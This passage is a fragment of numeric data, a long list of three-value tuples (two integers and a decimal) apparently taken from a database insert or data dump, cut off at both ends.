07331),(110,26887,0.42),(110,26888,1.26),(110,26889,1.4),(110,26890,0.56),(110,26891,1.14331),(110,26892,1.26),(110,26893,0.88669),(110,26894,1.09669),(110,26895,0.28),(110,26896,0.91),(110,26897,1.05),(110,26898,0.84),(110,26899,1.07331),(110,26900,1.16669),(110,26901,1.14331),(110,26902,1.28331),(110,26903,0.32669),(110,26904,1.12),(110,26905,1.21331),(110,26906,0.32669),(110,26907,0.98),(110,26908,1.09669),(110,26909,1.00331),(110,26910,1.12),(110,26911,1.00331),(110,26912,1.02669),(110,26913,1.68),(110,26914,2.1),(110,26915,1.82),(110,26916,2.00662),(110,26917,1.00331),(110,26918,1.14331),(110,26919,1.12),(110,26920,1.02669),(110,26921,1.14331),(110,26922,0.95669),(110,26923,1.02669),(110,26924,0.93331),(110,26925,1.12),(110,26926,0.84),(110,26927,0.93331),(110,26928,2.52),(110,26929,2.87007),(110,26930,0.84),(110,26931,0.91),(110,26932,0.86331),(110,26933,1.00331),(110,26934,2.58993),(110,26935,0.95669),(110,26936,0.95669),(110,26937,1.09669),(110,26938,2.00662),(110,26939,2.19338),(110,26940,0.93331),(110,26941,1.09669),(110,26942,0.95669),(110,26943,0.95669),(110,26944,1.05),(110,26945,1.00331),(110,26946,0.98),(110,26947,1.14331),(110,26948,1.05),(110,26949,2.24),(110,26950,0.98),(110,26951,1.05),(110,26952,0.42),(110,26953,0.98),(110,26954,1.07331),(110,26955,0.51331),(110,26956,1.16669),(110,26957,1.30669),(110,26958,0.95669),(110,26959,1.05),(110,26960,1.00331),(110,26961,1.21331),(110,26962,1.00331),(110,26963,1.23669),(110,26964,1.00331),(110,26965,1.09669),(110,26966,1.09669),(110,26967,1.35331),(110,26968,0.60669),(110,26969,1.09669),(110,26970,1.19),(110,26971,0.42),(110,26972,1.00331),(110,26973,1.12),(110,26974,1.05),(110,26975,1.14331),(110,26976,0.46669),(110,26977,1.00331),(110,26978,1.14331),(116,26979,0.18669),(110,26979,0.37338),(110,26980,1.02669),(110,26981,1.09669),(110,26982,0.91),(110,26983,1.09669),(110,26984,1.02669),(110,26985,1.21331),(110,26986,1.19),(110,26987,1.26),(110,26988,1.12),(110,26989,1.26),(110,26990,1.19),(110,26991,1.28331),(110,26992,1.12),(110,26993,1.19),(110,26994,1.07331),(110,26995,1.16669),(110,26996,0.28),(110,26997,0.98),(110,26998,1.12),(110,26999,0.95669),(110,27000,1.12),(110,27001,0.28),(110,27002,0.91),(110,27003,1.07331),(110,27004,0.56),(110,27005,1.21331),(110,27006,1.28331),(110,27007,0.51331),(110,27008,1.05),(110,27009,1.14331),(110,27010,0.42),(110,27011,0.98),(110,27012,1.21331),(110,27013,0.74662),(110,27014,1.12),(110,27015,1.33),(110,27016,1.02669),(110,27017,1.09669),(110,27018,0.95669),(110,27019,1.16669),(110,27020,0.37331),(110,27021,0.95669),(110,27022,1.14331),(110,27023,0.51331),(110,27024,1.14331),(110,27025,1.21331),(110,27026,0.14),(110,27027,0.95669),(110,27028,1.07331),(110,27029,0.86331),(110,27030,0.95669),(110,27031,1.05),(110,27032,0.95669),(110,27033,1.05),(110,27034,0.88669),(110,27035,0.95669),(110,27036,0.81669),(110,27037,1.09669),(110,27038,1.09669),(110,27039,1.07331),(110,27040,0.93331),(110,27041,1.00331),(110,27042,0.95669),(110,27043,1.02669),(110,27044,0.93331),(110,27045,1.00331),(110,27046,0.98),(110,27047,1.05),(110,27048,1.07331),(110,27049,0.88669),(110,27050,0.88669),(110,27051,0.98),(110,27052,0.86331),(110,27053,1.07331),(117,27054,0.23331),(128,27054,0.23331),(110,27054,0.46662),(110,27055,0.91),(110,27056,0.98),(110,27057,0.91),(110,27058,1.00331),(110,27059,0.28),(110,27060,0.93331),(110,27061,1.16669),(110,27062,0.88669),(110,27063,0.95669),(110,27064,1.02669),(110,27065,1.12),(110,27066,0.86331),(110,27067,1.05),(110,27068,2.79993),(110,27069,1.16669),(110,27070,1.16669),(110,27071,1.16669),(110,27072,2.66007),(110,27073,1.05),(110,27074,1.12),(110,27075,1.09669),(110,27095,0.93331),(110,27096,1.00331),(110,27097,0.95669),(110,27098,1.02669),(110,27099,0.86331),(110,27100,0.93331),(110,27101,1.77338),(110,27102,2.24),(110,27902,0.09331),(110,27903,0.95669),(110,27904,1.12),(110,27905,1.12),(110,27906,1.07331),(110,27907,1.37669),(110,27908,0.98),(110,27909,1.19),(110,27910,1.07331),(110,27911,1.37669),(110,27912,1.07331),(110,27913,1.37669),(110,27914,0.32669),(110,27915,1.16669),(110,27916,1.4),(110,27917,0.88669),(110,27918,0.95669),(110,27919,0.88669),(110,27920,0.95669),(110,27921,1.05),(110,27922,0.95669),(120,27922,0.95669),(134,27922,0.95669),(110,27923,1.02669),(110,27924,1.12),(110,27925,1.02669),(110,27926,1.07331),(110,27927,0.32669),(110,27928,1.00331),(110,27929,1.12),(110,27930,0.95669),(110,27931,1.12),(110,27932,0.23331),(116,27932,0.23331),(123,27932,0.23331),(110,27933,1.00331),(110,27934,1.12),(110,27935,0.32669),(117,27935,0.32669),(110,27936,0.93331),(110,27937,1.02669),(110,27938,0.91),(110,27939,1.02669),(110,27940,0.65338),(110,27941,1.00331),(110,27942,1.14331),(110,27943,0.93331),(110,27944,1.02669),(110,27945,0.56),(110,27946,1.05),(110,27947,1.12),(110,27948,1.00331),(110,27949,1.05),(110,27950,0.93331),(117,27950,0.93331),(118,27950,0.93331),(119,27950,0.93331),(110,27951,1.07331),(110,27952,0.86331),(110,27953,0.93331),(110,27954,0.81669),(110,27955,0.93331),(110,27956,1.02669),(110,27957,1.12),(110,27958,1.09669),(110,27959,1.37669),(110,27960,0.91),(110,27961,0.95669),(110,27962,0.95669),(118,27962,0.95669),(110,27963,1.16669),(120,27964,0.28),(110,27964,0.56),(110,27965,1.00331),(110,27966,1.09669),(110,27967,1.02669),(110,27968,1.09669),(110,27969,0.42),(123,27969,0.42),(110,27970,1.02669),(110,27971,1.12),(110,27972,0.93338),(110,27973,2.05338),(110,27974,1.12),(110,27975,1.16669),(112,27976,0.28),(117,27976,0.28),(110,27976,1.4),(110,27977,1.09669),(110,27978,1.19),(110,27979,1.05),(110,27980,1.30669),(110,27981,1.00331),(110,27982,1.09669),(110,27983,0.95669),(110,27984,1.05),(110,27985,0.88669),(110,27986,0.95669),(110,27987,0.74662),(110,27988,1.12),(110,27989,1.23669),(110,27990,1.00331),(110,27991,1.14331),(110,27992,1.19),(110,27993,1.30669),(110,27994,1.07331),(110,27995,1.16669),(110,27996,1.96),(110,27997,1.07331),(110,27998,1.05),(110,27999,0.46669),(110,28000,1.19),(110,28001,1.37669),(110,28002,0.51331),(112,28002,0.51331),(110,28003,1.16669),(110,28004,1.35331),(110,28005,0.91),(110,28006,1.05),(110,28007,0.88669),(116,28007,0.88669),(110,28008,1.05),(110,28009,0.74662),(110,28010,1.07331),(110,28011,1.26),(110,28012,1.02669),(110,28013,1.23669),(110,28014,0.86331),(110,28015,1.02669),(110,28016,0.93331),(110,28017,1.05),(110,28018,0.95669),(110,28019,1.02669),(110,28020,0.98),(110,28021,1.05),(110,28022,0.93331),(110,28023,1.14331),(110,28024,0.28),(126,28024,0.28),(110,28025,0.91),(110,28026,1.05),(123,28027,0.56),(110,28027,0.84),(110,28028,0.93331),(110,28029,1.12),(110,28030,0.93331),(110,28031,1.02669),(110,28032,1.00331),(110,28033,1.23669),(110,28034,0.65338),(110,28035,1.86662),(110,28036,2.05338),(110,28037,0.42),(110,28038,1.12),(110,28039,1.21331),(110,28040,1.02662),(110,28041,1.05),(110,28042,1.21331),(110,28043,1.05),(110,28044,1.14331),(110,28045,0.37331),(123,28045,0.74662),(110,28046,1.05),(110,28047,1.14331),(110,28048,0.28),(110,28049,1.02669),(110,28050,1.19),(110,28051,0.46669),(110,28052,1.00331),(110,28053,1.14331),(110,28054,6.43986),(110,28055,1.14331),(110,28056,1.23669),(110,28057,1.21331),(110,28058,1.14331),(110,28059,1.16669),(110,28060,1.21331),(110,28061,1.05),(110,28062,1.19),(110,28063,0.51331),(126,28063,0.51331),(110,28064,1.05),(110,28065,1.12),(110,28066,0.56),(110,28067,1.07331),(110,28068,1.4),(110,28069,0.23331),(110,28070,0.88669),(110,28071,1.07331),(110,28072,0.98007),(110,28073,0.95669),(110,28074,1.21331),(110,28075,2.05338),(110,28076,1.12),(110,28077,1.19),(110,28078,1.00331),(110,28079,1.07331),(110,28080,6.76599),(110,28081,0.91),(110,28082,1.00331),(110,28083,0.91),(110,28084,1.00331),(110,28085,0.88669),(110,28086,0.95669),(110,28087,0.98),(110,28088,1.05),(110,28089,1.07331),(110,28090,1.23669),(110,28091,0.98),(110,28092,1.05),(110,28093,1.05),(110,28094,1.14331),(110,28095,0.98),(110,28096,1.21331),(110,28097,1.02669),(110,28098,1.12),(110,28099,1.05),(110,28100,1.28331),(110,28101,1.09669),(110,28102,1.19),(110,28103,1.77338),(110,28104,1.00331),(110,28105,1.07331),(110,28106,0.86331),(110,28107,1.12),(110,28108,0.91),(110,28109,1.12),(110,28110,1.12),(110,28111,1.19),(110,28112,0.88669),(110,28113,1.02669),(110,28114,2.66007),(110,28115,1.05),(110,28116,1.14331),(110,28117,1.12),(110,28118,0.98),(110,28119,1.12),(110,28120,1.00331),(110,28121,1.26),(110,28122,0.95669),(110,28123,1.12),(110,28124,1.00331),(110,28125,1.07331),(110,28126,1.77338),(110,28127,0.95669),(110,28128,1.09669),(110,28129,1.19),(110,28130,1.23669),(110,28131,0.98),(110,28132,1.14331),(110,28133,0.91),(110,28134,1.02669),(110,28135,0.84),(110,28136,0.93331),(110,28137,1.02669),(110,28138,1.07331),(110,28139,1.19),(110,28140,0.95669),(110,28141,1.02669),(110,28142,0.32669),(123,28142,0.32669),(110,28143,0.93331),(110,28144,1.02669),(110,28145,0.42),(110,28146,1.21331),(110,28147,1.4),(110,28148,1.07331),(110,28149,1.23669),(110,28150,0.93331),(110,28151,1.19),(110,28152,1.00331),(110,28153,1.21331),(110,28154,1.26),(110,28155,1.00331),(110,28156,1.28331),(110,28157,2.00662),(110,28158,2.42662),(116,28159,0.42),(110,28159,3.78),(110,28160,2.00662),(110,28161,1.07331),(110,28162,1.07331),(110,28163,1.00331),(110,28164,1.19),(110,28165,0.98),(110,28166,1.07331),(110,28167,1.96),(110,28168,1.07331),(110,28169,1.12),(110,28170,2.14662),(110,28171,1.23669),(110,28172,1.26),(110,28173,1.05),(110,28174,1.21331),(110,28175,0.74662),(110,28176,1.02669),(110,28177,1.09669),(110,28178,1.09669),(110,28179,1.16669),(110,28180,0.37331),(110,28181,1.05),(110,28182,1.16669),(110,28183,1.07331),(110,28184,1.12),(110,28185,0.42),(110,28186,1.00331),(110,28187,1.07331),(110,28188,1.05),(110,28189,0.98),(110,28190,1.05),(110,28191,0.95669),(110,28192,1.05),(110,28193,1.05),(110,28194,1.05),(110,28195,0.37331),(110,28196,0.95669),(110,28197,1.12),(110,28198,0.46669),(110,28199,1.00331),(110,28200,1.28331),(110,28201,0.74662),(110,28202,1.00331),(110,28203,1.14331),(110,28204,1.00331),(110,28205,1.23669),(110,28206,0.42),(110,28207,1.07331),(110,28208,1.33),(110,28209,0.65338),(110,28210,0.95669),(110,28211,1.05),(110,28212,1.02669),(110,28213,1.14331),(110,28214,0.74662),(110,28215,1.91338),(110,28216,2.28662),(110,28217,1.07331),(110,28218,1.16669),(110,28219,1.00331),(110,28220,1.07331),(111,29623,0.77),(111,29624,0.95669),(111,30073,0.09331),(111,30074,0.91),(111,30075,1.07331),(111,30076,0.95669),(111,30077,1.05),(111,30078,0.86331),(111,30079,1.05),(111,30080,0.93331),(111,30081,1.07331),(111,30082,0.84),(111,30083,1.09669),(111,30084,0.86331),(111,30085,1.00331),(111,30086,0.86331),(111,30087,0.91),(111,30088,1.05),(111,30089,1.09669),(111,30090,0.95669),(111,30091,0.65331),(111,30092,1.19),(111,30093,1.26),(111,30094,0.91),(111,30095,1.14331),(111,30096,0.93331),(111,30097,1.21331),(111,30098,0.23331),(111,30099,1.02669),(111,30100,1.21331),(111,30101,0.18669),(111,30102,0.86331),(111,30103,1.02669),(111,30104,0.18669),(111,30105,1.05),(111,30106,1.30669),(111,30107,0.7),(111,30108,1.33),(111,30109,1.4),(111,30110,0.37331),(111,30111,1.12),(111,30112,1.26),(111,30113,0.23331),(111,30114,1.00331),(111,30115,1.07331),(111,30116,0.51331),(111,30117,1.16669),(111,30118,1.4),(111,30119,0.93324),(111,30120,1.05),(111,30121,1.19),(111,30122,1.02669),(111,30123,1.07331),(111,30124,1.00331),(111,30125,1.14331),(111,30126,1.02669),(111,30127,1.09669),(121,30128,0.14),(111,30128,0.56),(111,30129,1.63338),(111,30130,2.05338),(111,30131,0.88669),(111,30132,1.14331),(111,30133,0.91),(111,30134,1.09669),(111,30135,1.86662),(111,30136,1.12),(111,30137,1.02669),(111,30138,0.88669),(111,30139,0.98),(111,30140,0.95669),(111,30141,1.00331),(111,30142,0.37331),(111,30143,0.98),(111,30144,1.14331),(111,30145,0.91),(111,30146,1.05),(111,30147,0.95669),(111,30148,1.00331),(111,30149,0.95669),(111,30150,1.02669),(111,30151,0.98),(111,30152,1.14331),(111,30153,0.98),(111,30154,1.21331),(111,30155,1.00331),(111,30156,1.16669),(111,30157,0.98),(111,30158,1.09669),(111,30159,1.02669),(111,30160,1.21331),(111,30161,0.37331),(111,30162,1.09669),(111,30163,1.33),(111,30164,0.46662),(111,30165,0.93331),(111,30166,0.98),(111,30167,1.09669),(111,30168,1.16669),(111,30169,0.98),(111,30170,1.26),(111,30171,1.07331),(111,30172,1.16669),(111,30173,0.98),(111,30174,1.28331),(111,30175,0.46662),(111,30176,0.91),(111,30177,0.98),(111,30178,0.91),(111,30179,1.05),(111,30180,0.18669),(114,30180,0.18669),(111,30181,1.02669),(111,30182,1.07331),(111,30183,0.28),(111,30184,1.00331),(111,30185,1.16669),(111,30186,1.00331),(111,30187,1.16669),(111,30188,0.91),(111,30189,0.98),(111,30190,0.93331),(111,30191,1.07331),(111,30192,0.91),(111,30193,1.14331),(111,30194,1.00331),(111,30195,1.05),(111,30196,1.72662),(111,30197,1.02669),(111,30198,1.00331),(111,30199,1.91338),(111,30200,1.16669),(111,30201,1.09669),(111,30202,0.81669),(111,30203,0.98),(111,30204,1.96),(111,30205,1.14331),(111,30206,1.05),(111,30207,0.98),(111,30208,1.05),(111,30209,0.93331),(111,30210,0.88669),(111,30211,1.02669),(111,30212,0.95669),(111,30213,1.12),(111,30214,0.93331),(111,30215,1.02669),(111,30216,2.94),(111,30217,1.05),(111,30218,1.02669),(111,30219,1.07331),(111,30220,1.82),(111,30221,1.02669),(111,30222,1.00331),(111,30223,0.86331),(111,30224,1.00331),(111,30225,0.93331),(111,30226,1.02669),(111,30227,0.93331),(111,30228,0.98),(111,30229,0.84),(111,30230,0.95669),(111,30231,0.88669),(111,30232,1.21331),(111,30233,1.82),(111,30234,2.14662),(111,30235,0.84),(111,30236,0.93331),(111,30237,1.00331),(111,30238,1.09669),(111,30239,1.00331),(111,30240,1.07331),(111,30241,0.86331),(111,30242,1.09669),(111,30243,0.93331),(111,30244,1.00331),(111,30245,0.88669),(111,30246,1.02669),(111,30247,1.07331),(111,30248,1.14331),(111,30249,1.00331),(111,30250,1.07331),(111,30251,0.23331),(111,30252,0.95669),(111,30253,1.07331),(111,30254,0.46669),(111,30255,1.02669),(111,30256,1.23669),(111,30257,0.84),(111,30258,0.95669),(111,30259,1.02669),(111,30260,1.16669),(111,30261,1.26),(111,30262,0.46669),(111,30263,1.16669),(111,30264,1.35331),(111,30265,0.46669),(111,30266,1.00331),(111,30267,1.23669),(111,30268,0.32669),(111,30269,1.00331),(111,30270,1.23669),(111,30271,1.02669),(111,30272,1.12),(111,30273,0.42),(111,30274,0.95669),(111,30275,1.09669),(111,30276,0.32669),(111,30277,0.93331),(111,30278,1.07331),(114,30279,1.12),(111,30279,1.68),(111,30280,1.02669),(114,30280,1.02669),(111,30281,1.23669),(111,30282,1.05),(111,30283,1.28331),(111,30284,1.07331),(111,30285,1.21331),(111,30286,0.46669),(111,30287,1.00331),(111,30288,1.26),(111,30289,0.42),(111,30290,1.02669),(111,30291,1.07331),(111,30292,1.4),(111,30293,1.14331),(111,30294,1.30669),(111,30295,1.33),(111,30296,1.4),(111,30297,0.42),(111,30298,0.95669),(111,30299,1.12),(111,30300,0.14),(119,30300,0.14),(111,30301,0.93331),(111,30302,1.00331),(111,30303,0.91),(111,30304,1.21331),(111,30305,0.28),(111,30306,1.00331),(111,30307,1.09669),(111,30308,1.86655),(111,30309,1.02669),(111,30310,1.09669),(111,30311,1.05),(111,30312,1.12),(111,30313,1.05),(111,30314,1.12),(111,30315,1.05),(111,30316,1.14331),(111,30317,1.02669),(111,30318,1.16669),(111,30319,0.51331),(111,30320,1.14331),(111,30321,1.28331),(111,30322,0.28),(111,30323,1.14331),(111,30324,1.19),(111,30325,0.23331),(119,30325,0.23331),(111,30326,0.98),(111,30327,1.21331),(111,30328,0.23331),(111,30329,1.00331),(111,30330,1.14331),(111,30331,0.65338),(111,30332,0.91),(111,30333,1.07331),(111,30334,0.93331),(111,30335,1.09669),(114,30500,0.09331),(111,30500,0.27993),(111,30501,0.88669),(111,30502,0.93331),(111,30503,0.91),(111,30504,1.19),(111,30505,0.98),(111,30506,1.14331),(111,30507,0.65338),(111,30508,0.93331),(111,30509,1.07331),(111,30510,0.95669),(111,30511,1.12),(111,30512,0.28),(111,30513,1.00331),(111,30514,1.14331),(111,30515,0.28),(111,30516,1.00331),(111,30517,1.12),(111,30518,0.23331),(111,30519,1.05),(111,30520,1.26),(111,30521,0.18669),(111,30522,0.86331),(111,30523,0.23331),(111,30524,0.88669),(111,30525,1.07331),(114,30526,0.23331),(111,30526,0.46662),(111,30527,1.07331),(111,30528,1.14331),(111,30529,0.98),(111,30530,1.12),(111,30531,0.84),(111,30532,1.07331),(111,30533,1.23669),(111,30534,0.98),(111,30535,1.05),(111,30536,0.32669),(111,30537,0.95669),(111,30538,1.09669),(111,30539,0.23331),(120,30539,0.23331),(111,30540,0.95669),(111,30541,1.14331),(111,30542,0.32669),(111,30543,0.93331),(111,30544,1.14331),(111,30545,1.12),(111,30546,1.09669),(111,30547,0.98),(111,30548,0.95669),(111,30549,1.07331),(111,30550,0.84),(111,30551,0.93331),(111,30552,0.46662),(111,30553,0.91),(111,30554,1.02669),(111,30555,0.88669),(111,30556,1.14331),(111,30557,0.32669),(111,30558,0.93331),(111,30559,1.02669),(111,30560,0.42),(111,30561,1.07331),(111,30562,1.19),(111,30563,0.42),(111,30564,0.98),(111,30565,1.07331),(111,30687,0.77),(111,30688,0.98),(111,30689,0.95669),(111,30690,1.12),(111,30691,0.93331),(111,30692,1.02669),(111,30693,0.93331),(111,30694,1.02669),(111,30695,0.91),(111,30696,1.02669),(111,30697,0.91),(111,30698,0.95669),(111,30699,0.88669),(111,30700,0.98),(111,30701,0.84),(111,30702,1.00331),(111,30703,0.81669),(111,30704,0.98),(111,30705,0.81669),(111,30706,1.00331),(111,30707,1.00331),(111,30708,1.16669),(111,30709,1.77338),(111,30710,1.00331),(111,30711,1.05),(111,30712,0.91),(111,30713,1.05),(111,30714,1.86662),(111,30715,1.02669),(111,30716,1.02669),(111,30717,0.91),(111,30718,1.19),(111,30719,0.88669),(111,30720,1.14331),(111,30721,1.02669),(111,30722,1.07331),(111,30723,0.95669),(111,30724,1.07331),(111,30725,0.93331),(111,30726,0.98),(111,30727,1.68),(111,30728,0.93331),(111,30729,1.05),(111,30730,0.88669),(111,30731,0.95669),(111,30732,0.86331),(111,30733,0.93331),(111,30734,0.98),(111,30735,1.07331),(111,30736,0.91),(111,30737,1.09669),(111,30738,0.32669),(111,30739,0.98),(111,30740,1.07331),(111,30741,0.46669),(111,30742,1.02669),(111,30743,1.23669),(111,30744,0.93338),(111,30745,0.98),(111,30746,1.14331),(111,30747,1.02669),(111,30748,1.19),(111,30749,0.65338),(111,30750,1.00331),(111,30751,1.05),(111,30752,1.02669),(111,30753,1.19),(111,30754,0.95669),(111,30755,1.12),(111,30756,1.72662),(111,30757,0.95669),(111,30758,1.02669),(111,30759,0.93331),(111,30760,0.98),(111,30761,0.86331),(111,30762,0.93331),(111,30763,1.77338),(111,30764,1.05),(111,30765,0.98),(111,30766,0.81669),(111,30767,0.93331),(111,30768,0.88669),(111,30769,1.02669),(111,30770,0.88669),(111,30771,1.00331),(111,30772,0.88669),(111,30773,0.95669),(111,30774,0.95669),(111,30775,1.14331),(111,30776,0.88669),(121,30776,0.88669),(111,30777,0.95669),(111,30778,0.88669),(111,30779,0.93331),(111,30780,0.42),(111,30781,1.09669),(111,30782,1.16669),(111,30783,0.28),(111,30784,0.93331),(111,30785,1.00331),(111,30786,0.23331),(111,30787,1.00331),(111,30788,1.09669),(111,30789,0.32669),(111,30790,1.02669),(111,30791,1.19),(111,30792,0.42),(111,30793,0.98),(111,30794,1.05),(111,30795,0.42),(111,30796,1.05),(111,30797,1.26),(111,30798,0.56),(111,30799,1.16669),(111,30800,1.23669),(111,30801,0.23331),(111,30802,0.98),(111,30803,1.12),(111,30804,0.46669),(111,30805,1.12),(111,30806,1.21331),(111,30807,0.28),(111,30808,0.98),(111,30809,1.09669),(111,30810,0.51331),(111,30811,1.05),(111,30812,1.19),(111,30813,0.32669),(111,30814,0.95669),(111,30815,1.12),(111,30816,0.42),(111,30817,0.98),(111,30818,1.21331),(111,30819,0.46669),(111,30820,1.19),(111,30821,1.26),(111,30822,0.32669),(114,30822,0.32669),(111,30823,0.98),(111,30824,1.16669),(111,30825,0.28),(111,30826,0.88669),(111,30827,1.05),(111,30828,0.56),(111,30829,1.07331),(111,30830,1.21331),(111,30831,1.07331),(111,30832,1.30669),(111,30833,0.37331),(111,30834,0.98),(111,30835,1.02669),(111,31311,0.23331),(111,31312,0.98),(111,31313,1.05),(111,31314,2.4666),(111,31315,0.37331),(111,31316,1.09669),(111,31317,1.23669),(111,31318,0.32669),(111,31319,0.93331),(111,31320,1.07331),(111,31321,0.37331),(111,31322,0.98),(111,31323,1.09669),(111,31324,0.23331),(111,31325,0.98),(111,31326,1.12),(111,31327,0.51331),(111,31328,1.21331),(111,31329,1.4),(111,31330,0.37331),(111,31331,1.00331),(111,31332,1.23669),(111,31333,1.05),(111,31334,1.19),(111,31335,0.23331),(111,31336,1.07331),(111,31337,1.12),(111,31338,0.65338),(111,31339,0.93331),(111,31340,1.09669),(111,31341,0.95669),(111,31342,1.02669),(111,31343,0.69993),(111,31344,0.91),(111,31345,1.00331),(111,31346,1.82),(111,31347,0.98),(111,31348,0.98),(111,31349,1.02669),(111,31350,1.09669),(111,31351,0.86331),(111,31352,1.07331),(111,31353,0.84),(114,31353,0.84),(111,31354,0.93331),(111,31355,0.88669),(111,31356,1.05),(111,31357,0.91),(111,31358,0.98),(111,31359,0.51331),(111,31360,1.05),(111,31361,1.19),(111,31362,0.28),(111,31363,1.02669),(111,31364,1.14331),(111,31365,0.37331),(111,31366,1.02669),(111,31367,1.37669),(111,31368,0.37331),(111,31369,0.98),(111,31370,1.16669),(111,31371,0.37331),(111,31372,0.95669),(111,31373,1.07331),(111,31374,1.16669),(111,31375,1.26),(111,31376,0.65338),(111,31377,0.95669),(111,31378,1.16669),(111,31379,0.93331),(111,31380,0.98),(111,31381,1.40007),(111,31382,3.00993),(111,31383,3.36),(111,31384,0.37331),(111,31385,1.07331),(111,31386,1.14331),(111,31387,0.98007),(111,31388,1.82),(111,31389,1.05),(111,31390,1.21331),(111,31391,0.93331),(111,31392,1.05),(111,31393,0.56),(111,31394,1.16669),(111,31395,1.30669),(111,31396,0.32669),(111,31397,0.95669),(111,31398,1.02669),(111,31399,0.88669),(111,31400,1.16669),(111,31401,0.91),(111,31402,1.12),(111,31403,0.93331),(111,31404,1.09669),(111,31405,0.93331),(111,31406,1.00331),(111,31407,1.02669),(111,31408,1.12),(111,31409,0.91),(111,31410,1.05),(111,31411,1.00331),(111,31412,1.05),(111,31413,0.95669),(111,31414,1.00331),(111,31415,0.84),(111,31416,1.00331),(111,31417,1.02669),(111,31418,1.07331),(111,31419,0.91),(111,31420,1.00331),(111,31421,0.18669),(111,31422,0.98),(111,31423,1.16669),(111,31424,0.28),(111,31425,0.95669),(111,31426,1.09669),(111,31427,0.84),(111,31428,0.91),(111,31429,0.32669),(111,31430,0.91),(111,31431,1.00331),(111,31432,2.56655),(111,31433,1.12),(111,31434,1.33),(111,31435,1.02669),(111,31436,1.19),(111,31437,1.00331),(111,31438,1.09669),(111,31439,2.24),(111,31440,1.21331),(111,31441,1.26),(111,31442,0.37331),(111,31443,0.95669),(111,31444,1.19),(111,31445,0.42),(111,31446,1.09669),(111,31447,1.16669),(111,31448,0.42),(111,31449,1.00331),(111,31450,1.14331),(111,31451,1.02662),(111,31452,1.02669),(111,31453,1.14331),(111,31454,1.05),(111,31455,1.21331),(111,31456,0.28),(111,31457,1.02669),(111,31458,1.09669),(111,31459,0.60669),(111,31460,1.21331),(111,31461,1.4),(111,31462,0.46669),(111,31463,1.12),(111,31464,1.19),(111,31465,0.28),(111,31466,1.07331),(111,31467,1.14331),(111,31468,0.69993),(111,31469,0.88669),(111,31470,1.07331),(111,31471,0.95669),(111,31472,1.19),(111,31473,1.05),(111,31474,1.12),(111,31475,0.23331),(111,31476,0.93331),(111,31477,1.00331),(111,31478,0.42),(111,31479,0.98),(111,31480,1.12),(111,31481,0.32669),(111,31482,0.95669),(111,31483,1.02669),(111,31484,0.46669),(111,31485,1.09669),(111,31486,1.26),(111,31487,0.32669),(111,31488,1.21331),(111,31489,0.37331),(111,31490,1.19),(111,31491,1.30669),(111,31492,1.02669),(111,31493,1.21331),(111,31494,0.37331),(111,31495,0.98),(111,31496,1.23669),(111,31497,0.23331),(111,31498,1.14331),(111,31499,1.23669),(111,31500,0.37331),(111,31501,0.93331),(111,31502,1.02669),(111,31503,0.56),(111,31504,1.26),(111,31505,1.4),(111,31506,0.23331),(111,31507,1.00331),(111,31508,1.09669),(111,31509,0.14),(111,31510,0.95669),(111,31511,1.09669),(111,31512,1.05),(111,31513,1.23669),(112,32494,0.56661),(112,32495,0.23331),(112,32496,0.95669),(112,32497,1.05),(112,32498,0.14),(112,32499,0.98),(112,32500,1.16669),(112,32501,0.23331),(112,32502,0.95669),(112,32503,1.05),(112,32504,0.84),(112,32505,0.98),(112,32506,0.84),(112,32507,0.95669),(112,32508,0.32669),(112,32509,1.02669),(112,32510,1.26),(112,32511,0.37331),(112,32512,0.95669),(112,32513,1.07331),(112,32514,0.60669),(112,32515,1.05),(112,32516,1.16669),(112,32517,0.32669),(112,32518,0.98),(112,32519,1.02669),(112,32520,0.18669),(112,32521,0.93331),(112,32522,0.98),(112,32523,0.46669),(112,32524,1.05),(112,32525,1.26),(112,32526,0.28),(112,32527,1.00331),(112,32528,1.09669),(112,32529,0.46669),(112,32530,1.07331),(112,32531,1.35331),(112,32532,0.81669),(112,32533,0.93331),(112,32534,0.88669),(112,32535,0.93331),(112,32536,0.46669),(112,32537,1.05),(112,32538,1.28331),(112,32539,0.14),(117,32539,0.28),(112,32540,0.95669),(112,32541,1.05),(112,32542,0.65338),(112,32543,1.09669),(112,32544,1.28331),(112,32545,0.95669),(112,32546,1.14331),(112,32547,0.37331),(112,32548,1.07331),(112,32549,1.26),(112,32550,0.95669),(112,32551,1.12),(112,32552,0.18669),(112,32553,0.98),(112,32554,1.19),(112,32598,0.84),(112,32599,1.09669),(112,32600,0.88669),(112,32601,1.07331),(112,32602,0.84),(112,32603,0.98),(112,32604,0.28),(112,32605,1.00331),(112,32606,1.21331),(112,32607,0.18669),(112,32608,0.91),(112,32609,1.16669),(112,32610,0.91),(112,32611,1.05),(112,32612,1.00331),(112,32613,1.07331),(119,32614,0.18669),(112,32614,0.37338),(112,32615,0.86331),(112,32616,0.95669),(112,32617,0.91),(112,32618,0.95669),(112,32619,0.28),(112,32620,0.95669),(112,32621,1.02669),(112,32622,0.98),(112,32623,1.07331),(112,32624,0.95669),(112,32625,1.05),(112,32626,0.91),(112,32627,1.16669),(112,32628,0.37331),(112,32629,0.98),(112,32630,1.07331),(112,32631,0.23331),(123,32631,0.23331),(125,32631,0.23331),(112,32632,0.88669),(112,32633,0.98),(112,32634,1.05),(112,32635,1.16669),(112,32636,1.02669),(112,32637,1.28331),(112,32638,1.02669),(112,32639,0.95669),(112,32640,1.07331),(112,32641,0.91),(112,32642,1.05),(112,32643,0.95669),(112,32644,1.02669),(112,32645,1.21331),(112,32646,0.84),(112,32647,0.93331),(112,32648,0.91),(112,32649,1.02669),(112,32650,0.46669),(112,32651,1.02669),(112,32652,1.21331),(112,32653,0.95669),(112,32654,1.02669),(112,32655,1.09669),(112,32656,1.23669),(112,32657,0.37338),(112,32658,2.00662),(112,32659,1.16669),(112,32660,1.16669),(112,32661,0.23331),(112,32662,0.86331),(112,32663,0.98),(112,32664,0.32669),(120,32664,0.32669),(112,32665,0.93331),(112,32666,1.02669),(112,32667,0.95669),(112,32668,1.02669),(112,32669,0.91),(112,32670,1.12),(112,32671,0.14),(112,32672,0.84),(112,32673,0.91),(112,32765,0.86331),(112,32766,0.86331),(112,32767,1.12),(112,32768,0.84),(112,32769,1.05),(112,32770,0.84),(112,32771,0.95669),(112,32772,0.81669),(112,32773,0.88669),(112,32774,0.84),(112,32775,0.95669),(112,32776,0.88669),(112,32777,0.95669),(112,32778,0.84),(112,32779,0.91),(112,32780,1.02669),(112,32781,0.88669),(112,32782,1.09669),(112,32783,1.07331),(112,32784,0.98),(112,32785,0.98),(112,32786,0.93331),(112,32787,0.86331),(112,32788,0.98),(112,32789,0.37338),(112,32790,0.91),(112,32791,1.02669),(112,32792,0.93331),(112,32793,1.02669),(112,